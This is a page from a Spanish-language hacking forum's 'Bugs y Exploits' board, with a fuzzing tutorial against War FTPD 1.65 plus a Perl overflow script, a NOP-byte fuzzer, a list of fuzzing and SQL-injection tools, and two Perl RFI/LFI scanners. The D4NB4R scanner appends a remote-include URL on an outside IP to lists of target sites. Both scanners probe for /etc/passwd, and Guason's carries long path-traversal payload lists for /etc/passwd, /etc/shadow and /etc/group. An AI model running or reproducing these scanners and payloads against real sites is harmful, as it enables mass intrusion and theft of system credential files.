 [idea] Una rápida búsqueda en Google, probablemente arroje una serie de páginas con links a algunas de las herramientas más populares. Algunos buenos ejemplos de estas, sin lugar a dudas sean: SPIKE 2.9 de Immunitysec, mielietools 1.0 de Sensepost, SPI Fuzzer de SPI Dynamics y Fuzzer 1.1 de Sergio “Shadown” Alvarez.
 
 [idea] A los efectos de ilustrar este artículo, he decidido utilizar mi preferido: Fuzzer 1.1 de  Sergio “Shadown” Alvarez. Los motivos de esta elección son varios. En primer lugar, su código se encuentra disponible y se distribuye bajo GPL. En segundo lugar, es pequeño, sencillo, potente, rápido y esta escrito en Python .

 [idea] Antes de comenzar vamos a asegurarnos de que has obtenido lo necesario como para tener Fuzzer 1.1 funcionando en tu equipo de pruebas:

  Python 2.2:Puesto que Fuzzer 1.1, se encuentra desarrollado en Python, la instalación de este entorno resulta imprescindible

  pyOpenSSL:A fin de manejar en forma correcta el tráfico SSL, Fuzzer 1.1 requiere tener instaladas las librerías provistas por este wrapper de nombre pyOpenSSL  . Su instalación es sumamente sencilla y no deberías tener problemas para tener funcionando esta en segundos.

You are not allowed to view links. Register or Login



You are not allowed to view links. Register or Login

  Fuzzer 1.1

  Descargar Fuzzer 1.1 You are not allowed to view links. Register or Login

 [idea] Fuzzer 1.1 es una sencilla y potente herramienta de “fuzzing” desarrollada por Sergio “Shadown” Alvarez . Esta se entrega con los protocolos FTP, SMTP y POP3 declarados por defecto y listos para usar,  aunque debido a su concepción modular, el agregado de nuevos protocolos, debería resultar en una tarea sencilla pro medio de la edición del archivo de configuración “protocols.py”. Al descargar el tar.gz, no tendrás más que disponer de un directorio (fuzzer-1.1 por defecto) donde descomprimir sus archivos y comenzar a disfrutar de sus bondades.

 [idea] Ok, si todo ha salido bien, tu sistema contará a partir de este momento, con una instalación de Python, las rutinas SSL requeridas por la aplicación, y Fuzzer 1.1 lista para ser ejecutada. Para constatar que todo este funcionando, sencillamente abriremos  una ventana de comandos (Ejecutar-->CMD.exe-->Enter),  nos situaremos sobre el directorio donde hemos instalado Fuzzer 1.1, y ejecutaremos la siguiente línea:


Código: You are not allowed to view links. Register or Login
C:\Documents and Settings\Administrador\Escritorio\fuzzer-1.1>fuzzer.py
  Luego de dar entrada al comando anterior, deberías estar viendo la ayuda de Fuzzer 1.1 tal como se muestra en la Imagen.



 [idea] Felicitaciones!!
ya estas en condiciones de comenzar a realizar testear algunas aplicaciones y protocolos!, que ¿como haces esto? bien... la verdad es que la respuesta acuanto tus conocimientos de lenguajes de programación, protocolos, networking y seguridad, pero para no decepcionarte vamos a descargar un viejo programa FTP muy conocido por su popularidad y por la existencia de algunos Buffer Overflows encontrados en algunas de sus versiones, en particular en la 1.65, se trata de War FTP Daemon

  Descargar War FTPD Daemon 1.65You are not allowed to view links. Register or Login

 [idea] Ok, te diré lo que haremos ahora para poder probar la efectividad de Fuzzer 1.1 en la detección de posibles bugs en el software... Descargado e instalado este servidor FTP(Setup.exe), procederemos a ejecutarlo (war-ftpd.exe). Luego de dar OK en la pantalla de bienvenida, nos encargaremos de que el servicio FTP se ponga a correr... para esto, deberemos hacer click en el icono ilustrado con un rayo



Ya es hora, abriremos ahora una nueva ventana de comando (CMD.EXE), ingresaremos al directorio donde hayamos instalado el Fuzzer, y procederemos a ejecutarlo con la siguiente línea de comando:
 
Código: You are not allowed to view links. Register or Login
C:\Documents and Settings\Administrador\Escritorio\fuzzer-1.1>fuzzer.py –h localhost –p 21 –t FTP


 [idea] Perfecto, luego de dar entrada a esta línea, Fuzzer se pondrá a trabajar creando y enviando paquetes, para luego evaluar su resultado .



 [idea] Ahora bien, puesto que el software que estamos testeando tiene un bug (Reportado y reparado hace mucho tiempo ya...) llegara un momento donde Fuzzer hará que WarFTPD se cierre inesperadamente, para luego anunciar un mensaje en pantalla  en donde podrás leer:
 


 [idea] Ahora Analizamos la Informacion que nos Entrega Fuzzer 1.1 .


 [idea] Ahora si nos Damos Cuenta en un inicio del Analisis.

  Please enter your user name.: Como nos muestra en todo el analisis, empieza a verificar si puede producirse un buffer overflow por la cantidad de caracteres en el user o password, y empieza a chequear cuantos, caracteres nececita para poder provocar esta vulnerabilidad.

  Luego Detecta una Vulnerabilidad, por la cantidad de caracteres introducidos en el username. alrededor de 1000 caracteres.

 [idea] Tambien navegando por Internet encontre informacion que confirmo mi analisis sobre el Fuzzer.

 [idea] Esta vulnerabilidad fuese tenido alguna utilidad  hace 9 años, porque fue descubierto en 1998, busque y busque y no encontre un exploit, con conocimiento basico sobre perl se pudo codear este exploit, lo cual hago mension aqui, es mi primer exploit, aunque no tiene ninguna utilidad para explotar algun ordenador que este corriendo este servicio, pero si de uso educacional.

  Una ves Analizado el Resultado del Fuzzer, y respaldado por el Bugtraq, ahora podemos crear nuestro exploit.

Exploit War FTPD 1.65 Buffer Overflow By OzX [Perl]

Código: You are not allowed to view links. Register or Login
#!/usr/bin/perl
# ===============================================================================================
#                            War FTPD 1.65
#                               By OzX
# ==============================================================================================
# Referencia: [url]http://seclists.org/bugtraq/1998/Feb/0013.html[/url]
# Windows 95/NT War FTPD 1.65 Buffer Overflow
# Exploit Diseñado para el Manual de Fuzzer: Buscando Vulnerabilidades
# [url=http://www.new-Bytes.net]www.new-Bytes.net[/url]
# #================================================================================================
use strict;
use Net::FTP;

my $username = "////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////";
my $pwd = "exploit";
my $ftp = Net::FTP->new("localhost") or die("No se pudo conectar al servidor, porque el user y pass no eran correctos \n, pero se logro la intencion de crear el buffer overflow : $!");
$ftp->login($username,$pwd) or die("Login incorrecto: $!");
$ftp->quit or die("No se puede desconectar del servidor: $!");

  Bueno Aqui les Dejo un Video en donde Demuestra que el Exploit Funciona a la Perfeccion.

You are not allowed to view links. Register or Login




[idea] Saludos, y Ojala que entiendan mi Adaptacion, la creacion del Exploit y todo lo demas, la siguiente semana lo volvere a revisar para seguir expandiendolo ya que el tema da para mucho mas,tambien para que se paresca menos al paper original y se expanda, aunque de forma de introduccion es bastante bueno.

Propiedad de New-Bytes.net

15
Bugs y Exploits / Fuzzer para detectar B.O.F. By Xianur0
« en: Febrero 25, 2010, 11:55:12 am »
Código: Perl
  1. #!/usr/bin/perl
  2.  
  3. # By Xianur0
  4.  
  5.   use IO::Socket;
  6. my $host = $ARGV[0];
  7. my $puerto = $ARGV[1] || You are not allowed to view links. Register or Login("Uso: fuzzerbof.pl [ip] [puerto]\n");
  8. my $nop = "\x90";
  9. for($i=1;$i<1000000;$i++) {
  10. my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp', Timeout=>'10', ); You are not allowed to view links. Register or Login "No se Pudo Conectar a $host!\n" unless $sock;
  11. $paquete = $nop x $i;
  12. You are not allowed to view links. Register or Login $sock $paquete;
  13. if(!$sock) {
  14. You are not allowed to view links. Register or Login "Conexion Muerta al enviar $i bytes!\n";
  15. } else { You are not allowed to view links. Register or Login "Conexion Viva a $i bytez\n"; You are not allowed to view links. Register or Login($sock);}
  16. }

16
Bugs y Exploits / Que es un FUZZER y para que sirve
« en: Febrero 25, 2010, 11:54:47 am »
Herramientas de seguridad

Un fuzzer es un programa que intenta descubrir vulnerabilidades de seguridad enviando una entrada arbitraria a una aplicacion. Si el programa contiene una vulnerabilidad que puede conducir a una excepción, el choque o el error de servidor (en el caso de web apps), puede ser determinado que una vulnerabilidad ha sido descubierta. Fuzzers a menudo son llamados Inyectores de Falta por esta razón, ellos generan faltas y les envían a una aplicacion. Generalmente los fuzzers están bien para el encuentro de buffer overflow, DoS, SQL Injection, XSS, y bugs Format String . Ellos hacen un trabajo pobre en el encuentro de vulnerabilidades relacionada con el descubrimiento de la información, defectos de cifrado y cualquier otra vulnerabilidad que no hace que el programa se estrelle.

Contra lo que pueda parecer, el sistema no es nuevo. Fuzz, desarrollado en 1990 por Barton Miller en la Universidad de Wisconsin en Madison, pasa por ser el primer fuzzer, pero hoy en día se cuentan por decenas los programas de este tipo, utilizados generalmente en tests de penetración…

Pero, ¿cuál es la efectividad de los fuzzers contra los navegadores web? Sencillamente extraordinaria. Por poner un ejemplo, en pocas semanas H.D. Moore (investigador de seguridad creador y responsable del Metasploit Project), asegura haber encontrado cientos de formas de colgar Internet Explorer, y en menor medida el resto de navegadores.

La siguiente es una lista de programas fuzzers con una breve explicacion:

    * (L)ibrary (E)xploit API - lxapi

Una coleccion de Scripts en python para fuzzing
Mangle

Un fuzzer para generar etiquetas de HTML impares, esto también autolanzará un navegador. El programa encontró el infame IFRAME IE bug.
SPIKE - Una colección de muchos fuzzers de Inmunidad. Usado para encontrar el reciente remoto RDP kernel DoS against a firewalled XP SP2, y muchos otros.
PROTOS WAP - Un fuzzer del proyecto PROTOS para fuzzing WAP
PROTOS HTTP-reply - Otro fuzzer de los tipos PROTOS para ataque/ respuestas de HTTP, útiles para broswer vulns.
PROTOS LDAP - Para fuzzing LDAP, no tan acertado como los demás del proyecto PROTOS
PROTOS SNMP - Clasico SNMP fuzzer, encontrando una vuln en casi cada engranaje conectado a una red disponible en el tiempo (2002).
PROTOS SIP - Para fuzzing a todos aquellos nuevos dispositivos de VOIP SIP que usted ve por todas partes.
PROTOS ISAKMP - Para atacar implementaciones IPSec.
RIOT & faultmon - Para atacar protocolos de texto simples (Telnet, HTTP, SMTP). Usado por Riley Hassell cuando él trabajó en eEye para descubrir el IIS .printer overflow e incluido en The Shellcoder’s Handbook.
SPIKE Proxy - Un semi-funcional web fuzzer del Inmunidad que trajo el original SPIKE
Tag Brute Forcer - Fuzzer imponente de Drew Copley de eEye para atacar ActiveX en uso. Usado para encontrar un manojo de bugs en IE, incluyendo unos realmente poderosos para alcanzar heap overflows.
FileFuzz - Un formato de archivo fuzzer para PE (windows) binarios de iDefense. Tiene bonito GUI. Recientemente usado para encontrar bugs en Word.
SPIKEFile - Un formato de archivo fuzzer para ataque ELF (Linux) binarios de iDefense. Basado en SPIKE
notSPIKFile - Un ELF fuzzer estrechamente relacionado con FileFuzz, en vez de usar SPIKE como un punto de partida.
Screaming Cobra -El nombre hace al fuzzer parecer mejor de lo que realmente es, pero está bien para encontrar bugs CGI. También,es un perl script fácil de modificar o extenderse.
WebFuzzer -Un fuzzer para (adivina qué?) web app vulns.
eFuzz - Un fuzzer para el protocolo generico TCP/IP. Fácil de usar, pero tal vez no tan destacado como otros de esta lista.
Peach Fuzzer - Gran fuzzer escrito por Michael Eddington. Este Fuzzer es más un marco para construir otros fuzzers.
Fuzz - El ORIGINAL fuzzer desarrollado por Dr. Barton Miller que fue el Alma Matter, de la University of Wisconsin-Madison en 1990.
Fuzzball2 un pequeño fuzzer para TCP e IP. Esto envía un manojo de paquetes más o menos falsos a la host de su eleccion.
Fuzzer version 1.1 es una herramienta para fuzzing de multiple protocolo escrita en python.Esto puede ser usado encontrar SQL injection, format string, buffer overflow, directory traversal, y otras vulnerabilidades.
Scratch es un destructor de protocolo avanzado (”fuzzer”) que rutinariamente puede encontrar una amplia variedad de vulnerabilidades de un paquete simple. El programa hace el análisis de complejos archivos binarios. También viene con un marco para protocolos fuzzing binarios como SSL Y SMB.

* Nessus

Auditor de Seguridad Remoto. El cliente “The Nessus Security Scanner” es una herramienta de auditoría de seguridad. Hace posible evaluar módulos de seguridad intentando encontrar puntos vulnerables que deberían ser reparados. Está compuesto por dos partes: un servidor, y un cliente. El servidor/daemon, “nessusd” se encarga de los ataques, mientras que el cliente, “nessus”, se ocupa del usuario por medio de una linda interfaz para X11/GTK+. Este paquete contiene el cliente para GTK+1.2, que además existe en otras formas y para otras platarformas.

   
* Netcat

Una navaja multiuso para TCP/IP. Una utilidad simple para Unix que lee y escribe datos a través de conexiones de red usando los protocolos TCP o UDP. Está diseñada para ser una utilidad del tipo “back-end” confiable que pueda ser usada directamente o fácilmente manejada por otros programas y scripts. Al mismo tiempo, es una herramienta rica en características útil para depurar (debug) y explorar, ya que puede crear casi cualquier tipo de conexión que puedas necesitar y tiene muchas características incluídas.

Tcpdump

Una poderosa herramienta para el monitoreo y la adquisición de datos en redes. Este programa te permite volcar (a un archivo, la pantalla,etc.) el tráfico que presenta una red. Puede ser usado para imprimir los encabezados de los paquetes en una interfaz de red (”network interface”) que concuerden con una cierta expresión. Se puede usar esta herramienta para seguir problemas en la red, para detectar “ping attacks” o para monitorear las actividades de una red.

* Snort

un Sniffer/logger de paquetes flexible que detecta ataques. Snort está basado en la biblioteca `libpcap’ y puede ser usado como un “sistema de detección de intrusiones” (IDS) de poco peso. Posee un registro basado en reglas y puede buscar/identificar contenido además de poder ser usado para detectar una gran variedad de otros ataques e investigaciones (probes), como buffer overflows, barridos de puertos indetectables (stealth port scans), ataques CGI, pruebas de SMB (SMB probes), y mucho más. Otra característica importante de Snort es la capacidad de alertar en tiempo real, siendo estas alertas enviadas a syslog, un archivo de alerta separado o incluso a una computadora con Windows a través de Samba.

* Ethereal

Ethereal es un analizador de tráfico de redes, o “sniffer” para Unix y Sistemas operativos del tipo Unix. usa GTK+, una biblioteca de interfaz gráfica para el usuario (GUI), y libcap, una bliblioteca que facilita la captura y el filtrado de paquetes.

* Whisker

El excelente escáner de vulnerabilidades en CGI de Rain.Forest.Puppy.

* Abacus Portsentry

Este demonio de detección de barrido de puertos tiene la habilidad de detectar estos barridos (incluyendo “stealth scans”) en las interfaces de red de tu máquina. Como medida de alarma, puede bloquear al atacante por medio de “hosts.deny”, bloqueando el ruteo hacia la máquina hostil o por medio de reglas de firewall. Es parte del set de programas “Abacus”. Nota: Si no tenés idea de qué es una port/stealth scan, te recomiendo darte una vuelta por Psionic antes de instalar este paquete. De otra forma, podrías fácilmente bloquear cualquier host que no deberías. (por ej. tu servidor de NFS, tu servidor de DNS, etc.)

* DSniff

Un comprobador de integridad de archivos y directorios. Tripwire es una herramienta que ayuda a administradores y usuarios de sistemas monitoreando alguna posible modificación en algún set de archivos. Si se usa regularmente en los archivos de sistema (por ej. diariamente), Tripwire puede notificar a los administradores del sistema, si algún archivo fue modificado o reemplazado, para que se puedan tomar medidas de control de daños a tiempo.

* Hping2

hping2 es una herramienta de red capaz de enviar paquetes ICMP/UDP/TCP hechos a medida y de mostrar las respuestas del host destino de la misma manera en la que lo hace la herramienta `ping’ los las respuestas de ICMP. Puede manejar fragmentación y tamaños y cuerpo arbitrarios de paquetes; además puede ser utilizado para transferir archivo usando protocolos soportados. Al usar hping2, se puede: evaluar el desempeño de la red utilizando diferentes protocolos, tamaños de paquetes, TOS (type of service, o sea, tipo de servicio), y fragmentación; realizar descubrimiento de camino utilizando el campo MTU (onda traceroute); transferir archivos (incluso ante reglas de firewall muy fascistas); realizar funciones al estilo `traceroute’ pero bajo diferentes protocolos; detección remota de OS (`remote OS fingerprinting’); auditar una implementación de TCP/IP (`TCP/IP stack’) en particular; etc. hping2 es una buena herramienta para aprender acerca de TCP/IP.

* SARA

El Asistente de Investigación para el Auditor de Seguridad (Security Auditor’s Research Assistant) es una herramienta de análisis de seguridad de tercera generación que está basada en el modelo de SATAN y distribuída bajo una licencia del estilo de la GNU GPL. Promueve un ambiente colaborativo y es actualizada periódicamente para tener en cuenta las últimas amenazas.

* Sniffit

Una herramienta de monitoreo y “packet sniffer” para paquetes de TCP/UDP/ICMP. sniffit es capaz de dar información técnica muy detallada acerca de estos paquetes (SEC, ACK, TTL, Window, …) pero también los contenidos de los paquetes en diferentes formatos (hex o puro texto, etc.).

* IPFilter

IP Filter es un filtro de paquetes de TCP/IP, adaptable para uso en un ambiente de firewall. Puede ser utilizado como una módulo de kernel o incorporado en tu kernel de UNIX; es áltamente recomendable utilizarlo como un módulo de kernel. Viene junto con scripts para instalarlo y parchar archivos de sistema, si se require.

* Iptables/netfilter/ipchains/ipfwadm

Administradores de los filtros de paquetes de IP para kernels 2.4.X. iptables se usa para configurar, mantener e inspeccionar las tablas de reglas de filtrado de paquetes de IP en Linux. La herramienta iptables también soporta configuración de NAT (Network Address Translation) dinámica y estática.

* Firewalk

Firewalking es una técnica desarrollada por MDS y DHG que emplea técnicas del estilo de `traceroute’ para determinar las reglas de filtrado que se están usando en un dispositivo de transporte de paquetes (NdelT: quise traducir “packet forwarding device”). La última versión de esta herramienta, fierwalk/GTK incluye la opción de usar una interfaz gráfica y nuevos arreglos a errores.

* Strobe

Un “clásico” escáner de puertos de TCP de alta velocidad.

* Jonh the Ripper

Una herramienta activa para crackear passwords. Útil para encontrar passwords débiles de tus usuarios.

* Ntop

Muestra la utilización de la red al estilo de la herramienta `top’. Muestra un sumario del uso de la red de las máquinas en ella en un formato que recuerda a la utilidad de unix `top’. También puede ser utilizada en un `web mode’, que permite ver los resultados a través de un explorador de web.


Top 15 con las mejores tools o scanners de sql injection free.



* SQLIer
* SQLbftools
* SQL Injection Brute-forcer
* SQLBrute
* BobCat
* SQLMap
* Absinthe
* SQL Injection Pen-testing Tool
* SQID
* Blind SQL Injection Perl Tool
* SQL Power Injection
* FJ-Injector Framwork
* SQLNinja
* Automagic SQL Injector
* NGSS SQL Injector

[/b][/color]
FUENTE:
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

VIDEO
You are not allowed to view links. Register or Login


17
Bugs y Exploits / Scaner RFI and LFI by D4NB4R
« en: Febrero 25, 2010, 11:52:46 am »
bue aki les dejo un scaner espero sirva

Código: Perl
  1. #!/usr/bin/perl -w
  2. #######################################
  3. #
  4.  
  5. #     * coded by : D4NB4R
  6.  
  7. #
  8.  
  9. #     * Contact: [email protected]
  10.  
  11. #
  12.  
  13. #     * Greetz :  Pandora's Box Team  ; CCT TEAM ; Remoteexecution ; Clubhacker ; E-r00t ; Mitm
  14.  
  15. ########################################
  16. #------------------------------------------------------------------------------------#
  17. ########################################
  18. use LWP::UserAgent;
  19. use HTTP::Request;
  20. use LWP::Simple;
  21. ########################################
  22. #------------------------------------------------------------------------------------#
  23. ########################################
  24. $sis="eq linux";
  25. $cmd="clear";
  26. $cmd="cls";
  27. You are not allowed to view links. Register or Login("$cmd");
  28. ########################################
  29. #------------------------------------------------------------------------------------#
  30. ########################################
  31. You are not allowed to view links. Register or Login "                                            \n";
  32. You are not allowed to view links. Register or Login "       ---------------------------------------------------- \n";
  33. You are not allowed to view links. Register or Login "      |                                            *       | \n";
  34. You are not allowed to view links. Register or Login "      |  ****   *   *   * *****  ***** ****     *  *  **** |            \n";
  35. You are not allowed to view links. Register or Login "      |  *  *  * *  **  *  *   * *   * *   *   * *   *     | \n";
  36. You are not allowed to view links. Register or Login "      |  **** * * * * * *  *   * *   * * **   * * *   ***  | \n";
  37. You are not allowed to view links. Register or Login "      |  *    *   * *  **  *   * *   * *   *  *   *      * |  \n";
  38. You are not allowed to view links. Register or Login "      |  *    *   * *   * *****  ***** *    * *   *  ***** |    \n";
  39. You are not allowed to view links. Register or Login "       ----------------------------------------------------     \n";
  40. You are not allowed to view links. Register or Login "                       :::Options:::\n\n";
  41. You are not allowed to view links. Register or Login "                      1.  RFI  2.  LFI\n";
  42. ########################################
  43. #------------------------------------------------------------------------------------#
  44. ########################################
  45. You are not allowed to view links. Register or Login ":::Option::: ";
  46. ########################################
  47. #------------------------------------------------------------------------------------#
  48. ########################################
  49. my $option=<STDIN>;
  50. if ($option==1){&RFI}
  51. if ($option==2){&LFI}
  52. ########################################
  53. #------------------------------------------------------------------------------------#
  54. ########################################
  55. #######
  56. # RFI #
  57. ###############################################
  58. #------------------------------------------------------------------------------------#
  59. ########################################
  60. sub RFI {
  61. #
  62. You are not allowed to view links. Register or Login "\n----------------------------------------------------\n";
  63. You are not allowed to view links. Register or Login "|                       RFI                        |\n";
  64. You are not allowed to view links. Register or Login "----------------------------------------------------\n";
  65. You are not allowed to view links. Register or Login "\Introdusca el .txt donde esta la url a escanear\n";
  66. ###############################################
  67. #------------------------------------------------------------------------------------#
  68. ########################################
  69. $lista=<STDIN>;
  70. You are not allowed to view links. Register or Login($lista);
  71. #
  72. You are not allowed to view links. Register or Login("$cmd");
  73. #
  74. You are not allowed to view links. Register or Login "...Escaneando...\n\n";
  75. #
  76. You are not allowed to view links. Register or Login(LISTA, "$lista");
  77. while(<LISTA>) {
  78. #
  79. my $lista = $_;
  80. You are not allowed to view links. Register or Login $lista;
  81. #
  82. my $rfi= "[url]http://63.247.72.196/cmd?[/url]";
  83. #
  84. my $url=$lista.$rfi;
  85. #
  86. my $req=HTTP::Request->new(GET=>$url);
  87. my $ua=LWP::UserAgent->new();
  88. $ua->timeout(20);
  89. my $resposta=$ua->request($req);
  90. #
  91. if($resposta->content =~ /pandora's/){
  92. You are not allowed to view links. Register or Login "<ul class="bbc_list"><li type="square"> * Encontrado * $url\n";[/li][/list]
  93. You are not allowed to view links. Register or Login(a, ">>RFI.txt");
  94. You are not allowed to view links. Register or Login a "$url\n";
  95. You are not allowed to view links. Register or Login(a);
  96.   }else{ You are not allowed to view links. Register or Login "[-] * No vulnerable * $url\n"; }
  97. }
  98. ###############################################
  99. #------------------------------------------------------------------------------------#
  100. ########################################
  101. }
  102. #
  103. #######
  104. # LFI #
  105. ###############################################
  106. #------------------------------------------------------------------------------------#
  107. ########################################
  108. sub LFI {
  109. #
  110. You are not allowed to view links. Register or Login "\n----------------------------------------------------\n";
  111. You are not allowed to view links. Register or Login "|                       Lfi                        |\n";
  112. You are not allowed to view links. Register or Login "----------------------------------------------------\n";
  113. #
  114. You are not allowed to view links. Register or Login "introdusca el .txt donde esta la url a escanear\n\n";
  115. ###############################################
  116. #------------------------------------------------------------------------------------#
  117. ########################################
  118. You are not allowed to view links. Register or Login($lista = <STDIN>);
  119. #
  120. You are not allowed to view links. Register or Login("$cmd");
  121. #
  122. You are not allowed to view links. Register or Login "....Escaneando....\n\n";
  123. #
  124. You are not allowed to view links. Register or Login(LISTA, "$lista");
  125. while(<LISTA>) {
  126. #
  127. my $lista = $_;
  128. You are not allowed to view links. Register or Login $lista;
  129. #
  130. @lfi= ('/etc/passwd',
  131.        '/etc/passwd%00',
  132.        '../../../../../../../../../../../../../../../etc/passwd',
  133.        '../../../../../../../../../../../../../../../etc/passwd%00');
  134. #
  135. foreach $bug(@lfi){
  136. #
  137. my $url=$lista.$bug;
  138. #
  139. my $req=HTTP::Request->new(GET=>$url);
  140. my $ua=LWP::UserAgent->new();
  141. $ua->timeout(10);
  142. my $response=$ua->request($req);
  143. #
  144. if($response->content =~ /root:x:/ ||
  145. $response->content =~ /root:*:/ ||
  146. $response->content =~ /root:!:/){
  147. You are not allowed to view links. Register or Login "</li><li type="square"> * Encontrado * $url\n";[/li][/list]
  148. You are not allowed to view links. Register or Login(a, ">>LfI.txt");
  149. You are not allowed to view links. Register or Login a "$url\n";
  150. You are not allowed to view links. Register or Login(a);
  151. }else{
  152. You are not allowed to view links. Register or Login "[-] * No Vulnerable * $url\n";}
  153.   }
  154. }
  155. }
  156. ########################################
  157. #-------------------Scaner by D4NB4R --------------------#
  158. ########################################

18
Bugs y Exploits / Metasploit Framework 3.2
« en: Febrero 25, 2010, 11:45:25 am »

¿Qué es?
El Metasploit Framework es una plataforma de desarrollo para la creación de herramientas de seguridad y vulnerabilidades. El Framework es utilizado por profesionales de la seguridad de la red para realizar pruebas de vulnerabilidades, los administradores de sistemas para verificar las instalaciones de parches, los proveedores de productos para realizar pruebas de regresión, los investigadores y la seguridad en todo el mundo. El Framework está escrito en el lenguaje de programación Ruby e incluye componentes escritos en C y ensamblador.

¿Qué hace?
El Framework consta de herramientas, bibliotecas, módulos, y las interfaces de usuario. La función básica del Framework es un módulo lanzador, lo que permite al usuario configurar un módulo de explotar y poner en marcha en un sistema de destino. Si la explotación de éxito, la carga útil se ejecuta en el blanco y el usuario dispone de un depósito de interactuar con la carga útil.

framework-3.2.exe (win32)You are not allowed to view links. Register or Login
framework-3.2.tar.gz (unix)You are not allowed to view links. Register or Login

19
Bugs y Exploits / Moe Multi-Scanner by Guason
« en: Febrero 25, 2010, 11:42:42 am »
Guason ah terminado su multi-scanner in perl. Espero q les sirva.

Este scanea
                 RFI
                 XSS
                 LFI (No disponible)

Entre otras opciones permite el scaneo single (solo una web) o un file para mayor comodidad con varias webs

El resultado se obtiene en el disco C "c:/"

Aca el code


Código: You are not allowed to view links. Register or Login
#Name program = moe.pl
#Version = beta
#Autor = Guason
#Version = 1.0

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

menu:

system ("cls");
system (" mode con cols=150");
system ("mode con lines=100");

print q (


11111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111
11111111111111111111110000000010111111111111111111     ----------SINGLE SCAN-------------
11111111111111111111100000000000001111111111111111
11111111111111111111100000000000001111111111111111      1 - Scan XSS
11111111111111111111000110000100000111111111111111      2 - Scan LFI
11111111111111111110001000011011100011111111111111      3 - Scan RFI
11111111111111111000000000000000010011111111111111     
11111111111111110000000100000000000011111111111111
11111111111111111000000000000000000111111111111111     --------------------------------------------
11111111111111110000000100000000000011111111111111
11111111111111110000000001010000000000011111111111
11111111111111110000001001111100000000011111111111
11111111111111110000000001111111011100011111111111    --------MULTIPLE SCAN----------
11111111111111111100000001111111001111111111111111
11111111111111111000010000000000001111111111111111        4 - Multiple scan XSS
11111111111111111110010000000000000011111111111111        5 - Multiple scan LFI  (NO)
11111111111111111111100000000000000011111111111111        6 - Multiple scan RFI
11111111111111111111100000000000000000111111111111       
11111111111111111111000000000000000000111111111111
11111111111111111111100000000000000000001111111111    --------------------------------------------
11111111111111100111100000000000000000001111111111
11111111111111110011110000000000011001111111111111
11111111111111111011111000000111111111111111111111
11111111111111111001111110001111111111111111111111
11111111111111111101111111111111111111111111111111
11111111111111111100111110000011111111111111111111
11111111111111111110111111010101111111111111111111   -----------------------------------------------
11111111111111111110011100000011111111111111111111
11111111111111111110011100110111111111111111111111            7  - About x
11111111111111111110001111110011111111111111111111           8 - Salir del programa
11111111111111111111111111111011111111111111111111
11111111111111111111111111111001111111111111111111
11111111111111111111001111111001111111111111111111  ---------------------------------------------
11111111111111111111001111111101111111111111111111
11111111111111111111001111111101111111111111111111     Autor = Guason
11111111111111111111011111111111111111111111111111
11111111111111111111011111111111111111111111111111
11111111111111111111011111111111111111111111111111

);


print "\n\n";
print "Escoge opcion =";
$opcion = <STDIN>;
chomp $opcion;
print "\n";

if ($opcion == 1 ) { &xss }
if ($opcion == 2 ) { &lfi }
if ($opcion == 3 ) { &rfi }
if ($opcion == 4 ) { &m_xss }
if ($opcion == 5 ) { &m_lfi }
if ($opcion == 6 ) { &m_rfi }
if ($opcion == 7 ) { &about }
if ($opcion == 8 ) { &salir }




if ($opcion =! 1||2||3||4||5||6||7||8) {goto menu ;}





sub lfi {
system ("cls");
print  "\n\n";
print "Pagina web a probar con LFI :::";
$lfi = <STDIN>;
chomp $lfi;
print "\n\n";

print "Objectivo : $lfi\n\nn";



if($lfi !~/http:\/\//){
     $lfi ="http://$lfi";}
            @devil=(
            '../../etc/passwd%00',
            '../../../etc/passwd%00',
            '../../../../etc/passwd%00',
            '../../../../../etc/passwd%00',
            '../../../../../../etc/passwd%00',
            '../../../../../../../etc/passwd%00',
            '../../../../../../../../etc/passwd%00',
            '../../../../../../../../../etc/passwd%00',
            '../../../../../../../../../../etc/passwd%00',
            '../../../../../../../../../../../etc/passwd%00',
            '../../../../../../../../../../../../etc/passwd%00',
            '../../../../../../../../../../../../../etc/passwd%00',
            '../../../../../../../../../../../../../../etc/passwd%00',
            '../../../../../../../../../../../../../../../..etc/passwd%00',
            '../../etc/passwd',
            '../../../etc/passwd',
            '../../../../etc/passwd',
            '../../../../../etc/passwd',
            '../../../../../../etc/passwd',
            '../../../../../../../etc/passwd',
            '../../../../../../../../etc/passwd',
            '../../../../../../../../../etc/passwd',
            '../../../../../../../../../../etc/passwd',
            '../../../../../../../../../../../etc/passwd',
            '../../../../../../../../../../../../etc/passwd',
            '../../../../../../../../../../../../../etc/passwd',
            '../../../../../../../../../../../../../../etc/passwd',
            '../../../../../../../../../../../../../../../..etc/passwd',
            '../etc/shadow',
            '../../etc/shadow',
            '../../../etc/shadow',
            '../../../../etc/shadow',
            '../../../../../etc/shadow',
            '../../../../../../etc/shadow',
            '../../../../../../../etc/shadow',
            '../../../../../../../../etc/shadow',
            '../../../../../../../../../etc/shadow',
            '../../../../../../../../../../etc/shadow',
            '../../../../../../../../../../../etc/shadow',
            '../../../../../../../../../../../../etc/shadow',
            '../../../../../../../../../../../../../etc/shadow',
            '../../../../../../../../../../../../../../etc/shadow',
            '../etc/group',
            '../../etc/group',
            '../../../etc/group',
            '../../../../etc/group',
            '../../../../../etc/group',
            '../../../../../../etc/group',
            '../../../../../../../etc/group',
            '../../../../../../../../etc/group',
            '../../../../../../../../../etc/group',
            '../../../../../../../../../../etc/group',
            '../../../../../../../../../../../etc/group',
            '../../../../../../../../../../../../etc/group',
            '../../../../../../../../../../../../../etc/group',
            '../../../../../../../../../../../../../../etc/group',
            '../etc/security/group',
            '../../etc/security/group',
            '../../../etc/security/group',
            '../../../../etc/security/group',
            '../../../../../etc/security/group',
            '../../../../../../etc/security/group',
            '../../../../../../../etc/security/group',
            '../../../../../../../../etc/security/group',
            '../../../../../../../../../etc/security/group',
            '../../../../../../../../../../etc/security/group',
            '../../../../../../../../../../../etc/security/group',
            '../etc/security/passwd',
